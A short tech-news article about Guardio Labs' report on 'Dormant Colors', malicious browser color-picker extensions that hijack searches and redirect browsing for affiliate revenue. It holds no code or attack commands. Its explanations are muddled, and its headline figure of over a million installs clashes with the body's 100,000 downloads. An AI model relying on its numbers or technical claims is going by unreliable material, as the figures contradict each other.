The Google Chrome extension, with over a million installed, takes over the targeted browser

A discovery has been made by the cyber security research team at Guardio Lab. As per the lab results, a new malware-type activity forced the Google Chrome extension to hijack users' search history and add links to Google’s Web page.

As a result, the add-on allows the person to customize the color in any way they want, and because the malware made its debut directly on the user's device, having no detectable coding, leads to the undetected entry. This is why the malware has been named Dormant Colors.

The research further showed that as of October 15th, 2022, thirty different versions of the malware were available on Google’s and Microsoft's web stores, which led to over 100,000 downloads.

The malware begins its activity through page redirects and advertisements whenever the user can install or watch. Unfortunately, when the user clicks on this item, they are shifted to another page, highlighting the need for an add-on to move forward.

This is when the user decides to allow the affected malware on their device in the name of extensions as they click the respected option. At first, the user will be redirected to several web pages which load the bugged codes, guiding the original malware on how to carry on its function.

At the time of search take-over, the chrome extension is going to transport the searched items from a webpage associated with the malware operator. As a result, they can easily make revenue through ads and selling data. The ability of the malware isn’t restricted here. Instead, it goes forward by taking over the users' Internet surfing to over 10,000 sites and keeps the user redirected to a single page which will have the link embedded in the URL.

As soon as a sale is made on such a URL, the web page will be able to make money out of it. Currently, the malware is not going for other credentials, but it can be expected that Dormant Colors may get strong enough to get its hand on online credentials and take over online banking or personal data files. Currently, no sign has been observed for such actions, but Guardio Lab is concerned that if this thing moves forward, it may become a threat to users' privacy due to its undetected entry. A lot of websites have already been taken down by the respective authorities, but still, the malware developers keep getting them back through either another webpage or a new domain.

Read next: Google Fined $113 Million By India With Orders To Allow Developers To Utilize Third-Party Payments
Previous Post Next Post